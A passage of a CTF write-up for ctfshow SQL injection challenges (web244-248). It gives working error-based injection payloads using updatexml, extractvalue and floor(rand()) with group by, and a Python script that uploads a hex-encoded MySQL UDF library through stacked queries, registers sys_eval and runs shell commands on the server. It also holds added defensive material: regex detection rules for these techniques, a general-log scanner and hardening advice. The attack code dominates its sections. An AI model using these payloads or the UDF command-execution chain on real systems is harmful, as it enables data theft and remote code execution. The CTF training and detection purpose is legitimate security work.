updatexml(target XML document, XML path, new content): function that updates an XML document

Both are injected through the XML path argument

payload:

updatexml:
?id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,substr((select group_concat(flag) from ctfshow_flag),1,32),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,(select left(flag,32) from ctfshow_flag),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,(select right(flag,32) from ctfshow_flag),0x7e),1)+--+

extractvalue:
?id=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))+--+

?id=1' or extractvalue(1,concat(0x7e,substr((select group_concat(flag1) from ctfshow_flagsa),1,30),0x7e))+--+

ctfshow{60c51f5b-9f2e-43bb-8781-225b09375b46}

web246

Challenge

updatexml and extractvalue are filtered

Solution

#get the table names
1' union select 1,count(*),concat(0x3a,0x3a,(select (table_name) from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23

#get the column names
1' union select 1,count(*),concat(0x3a,0x3a,(select (column_name) from information_schema.columns where table_name='ctfshow_flags' limit 1,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23

#get the data
1' union select 1,count(*),concat(0x3a,0x3a,(select (flag2) from ctfshow_flags limit 0,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23

web247

MySQL rounding functions
1. round
Round half up
round(s,n): rounds s to n decimal places; n may be positive, negative or zero.
To round to the integer part, set n to zero.

2. ceil
Round up
ceil(s): returns the smallest integer greater than s

3. floor
Round down
floor(s): returns the largest integer smaller than s

Just replace the floor from the previous step with ceil or round.
One thing to note: the column name comes out as flag?, so wrap it in backticks when querying the data.

1' union select 1,count(*),concat(0x3a,0x3a,(select (`flag?`) from ctfshow_flagsa  limit 0,1),0x3a,0x3a, round(rand(0)*2))a from information_schema.columns group by a%23
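Seen from the defender's side, the payload families in web217 through web247 (cross-join delays, hex-encoded PREPARE, INTO OUTFILE export options, updatexml/extractvalue errors, floor(rand()) with group by) leave distinctive traces in request logs. An added example, not from this write-up: a small Python rule set that URL-decodes a request, expands 0x... literals into the text they encode, and tags the technique; the rule names, the waf_hits helper and the sample query strings are my own constructions.

```python
import re
from urllib.parse import unquote_plus

# web226's blocklist, copied from the write-up's waf() for comparison
WAF_226 = re.compile(
    r"file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(",
    re.I)

# One rule per technique family seen in web217-web247. Names are my own.
RULES = {
    # web217-219: a cross join over information_schema used as a delay
    "heavy-join-delay": re.compile(
        r"information_schema\.\w+\s+\w+\s*,\s*information_schema\.", re.I),
    # web233: explicit delay functions
    "time-delay": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    # web217-223: if(...substr(...)) character-by-character extraction
    "conditional-extract": re.compile(
        r"\bif\s*\(.*?\b(?:substr|substring|mid|locate)\s*\(", re.I | re.S),
    # web225-227: a second statement after the injected quote
    "stacked-query": re.compile(
        r";\s*(?:prepare|execute|show|handler|select|set)\b", re.I),
    "prepared-stmt": re.compile(r"\bprepare\s+\w+\s+from\b", re.I),
    # web175/web248 style file writes sent in the request itself
    "file-write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    # web242-243: export options smuggled through the filename
    "export-options": re.compile(
        r"\b(?:lines|fields)\s+(?:starting|terminated|enclosed)\s+by\b", re.I),
    # web244-245
    "error-xml": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    # web246-247: duplicate-key error via rand() and group by
    "error-dupkey": re.compile(
        r"\b(?:floor|round|ceil)\s*\(\s*rand\s*\(.*\bgroup\s+by\b", re.I | re.S),
    "schema-probe": re.compile(
        r"\binformation_schema\.(?:tables|columns|routines)\b"
        r"|\bmysql\.innodb_table_stats\b", re.I),
}

HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})\b", re.I)


def normalise(raw):
    """URL-decode the request and replace MySQL 0x... literals with the text
    they encode, so a statement hidden in hex (web226/web227) is matched as
    the SQL that PREPARE ... FROM 0x... will execute."""
    text = unquote_plus(raw)

    def expand(match):
        try:
            return bytes.fromhex(match.group(1)).decode("utf-8", "replace")
        except ValueError:  # odd-length hex is not a decodable literal
            return match.group(0)

    return HEX_LITERAL.sub(expand, text)


def classify(raw):
    """Sorted list of rule names that fire on one request query string."""
    text = normalise(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def waf_hits(raw, waf=WAF_226):
    """(hit on raw text, hit on normalised text). The write-up's blocklist
    only catches the hex-encoded statement if it runs after normalisation."""
    return bool(waf.search(raw)), bool(waf.search(normalise(raw)))


# Constructed sample query strings modelled on the write-up's payloads;
# they are not captured traffic.
SAMPLES = {
    "cartesian": "ip=1) or if(substr((select x from t),1,1)='c',(SELECT count(*) "
                 "FROM information_schema.tables A, information_schema.schemata B),1)&debug=1",
    "hex-prepare": "username=1';PREPARE s from 0x73686F77207461626C6573;EXECUTE s;",
    "export": "filename=x.txt' LINES STARTING BY 'constructed';%23",
    "xml-error": "id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)--+",
    "dupkey": "id=1' union select 1,count(*),concat(0x3a,(select x from t limit 0,1),"
              "floor(rand(0)*2))a from information_schema.columns group by a%23",
    "benign": "page=2&limit=10&username=alice",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:12s} {classify(raw)} waf raw/normalised={waf_hits(raw)}")
```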

web248

Challenge

Solution

import requests

base_url="http://1ef2b753-fc26-4b9a-b5e7-9e06f9841c14.challenge.ctf.show/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf = "7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000
000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E350000000000000000000002000200020002000200020002000200020002000200020002000100010001000100010001000100010001000100010001000100010001000100010001000
1000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E8488
94DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C
7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000B
C000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E737
96D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000
000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C026000000000000420300000
00000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF901620000
00000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6
F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400"
for i in range(0, 21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])   # split the hex-encoded .so into 5000-character chunks

p = dict(zip(text, payload))     # map chunk name (a..e) -> hex chunk

for t in text:
    # stacked query: write each chunk into its own file under the plugin directory
    url = base_url + "?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t)
    r = requests.get(url)
    print(r.status_code)

# concatenate the chunk files back into a single shared object
next_url = base_url + "?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'--+&page=1&limit=10"
rn = requests.get(next_url)

uaf_url = base_url + "?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"  # register the UDF function
r = requests.get(uaf_url)
nn_url = base_url + "?id=';select sys_eval('cat /flag.*');--+&page=1&limit=10"
rnn = requests.get(nn_url)
print(rnn.text)
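Added detection example, not part of the original writeup: every step of the script above (chunked `into dumpfile` writes under the plugin directory, the `CREATE FUNCTION ... SONAME` registration, the `sys_eval` call) leaves a distinct statement in the MariaDB general log, so a log scan can flag them and correlate the plugin-dir write with the UDF registration on the same connection. The log line format and the sample statements are assumptions modelled on this page's script; the log lines are constructed, not captured.

```python
import re
# Constructed MariaDB general-log lines ("YYMMDD HH:MM:SS  ID Command Argument"),
# modelled on the chunked UDF upload above; these are not real captured logs.
SAMPLE_LOG = """\
231022 16:40:01   12 Query  select username,password from ctfshow_user5 where id = '1' limit 1
231022 16:40:02   12 Query  select unhex('7F454C46') into dumpfile '/usr/lib/mariadb/plugin/a.txt'
231022 16:40:03   12 Query  select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'
231022 16:40:04   12 Query  CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'
231022 16:40:05   12 Query  select sys_eval('id')
231022 16:40:06   13 Query  select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'
"""

LOG_LINE = re.compile(r"^(?P<ts>\d{6}\s+\d{2}:\d{2}:\d{2})\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Each rule: (name, regex over the whitespace-normalised statement), most to least specific.
RULES = [
    ("file_write_to_plugin_dir", re.compile(r"into\s+(?:dump|out)file\s+'[^']*/plugin/", re.I)),
    ("udf_registration", re.compile(r"create\s+function\s+\w+\s+returns\s+\w+\s+soname", re.I)),
    ("udf_command_exec", re.compile(r"\bsys_(?:eval|exec)\s*\(", re.I)),
    ("file_write", re.compile(r"into\s+(?:dump|out)file\s+'", re.I)),
    ("hex_payload_write", re.compile(r"unhex\s*\(\s*'[0-9a-f]{8,}'", re.I)),
]

def classify(statement):
    """Return the names of all rules the statement matches (empty list = nothing flagged)."""
    stmt = " ".join(statement.split())  # collapse whitespace so spacing tricks do not split tokens
    return [name for name, rx in RULES if rx.search(stmt)]

def scan_log(text):
    """Return (connection_id, timestamp, matched_rules, statement) for each flagged Query line."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        tags = classify(m.group("arg"))
        if tags:
            hits.append((int(m.group("conn")), m.group("ts"), tags, m.group("arg")))
    return hits

def udf_chain_connections(hits):
    """Connections that both wrote into the plugin dir and registered a UDF: the chain on this page."""
    seen = {}
    for conn, _, tags, _ in hits:
        seen.setdefault(conn, set()).update(tags)
    return sorted(c for c, t in seen.items() if {"file_write_to_plugin_dir", "udf_registration"} <= t)

if __name__ == "__main__":
    for conn, ts, tags, stmt in scan_log(SAMPLE_LOG):
        print(f"{ts} conn={conn} {','.join(tags)}: {stmt[:70]}")
    print("UDF chain on connections:", udf_chain_connections(scan_log(SAMPLE_LOG)))
```

On a hardened server the chain breaks before any log rule fires: `secure_file_priv` pointing at a directory other than `plugin_dir` (or disabled entirely) stops the dumpfile write, and a web application account without the FILE privilege and without INSERT on the `mysql` system database can neither write plugin files nor register UDFs.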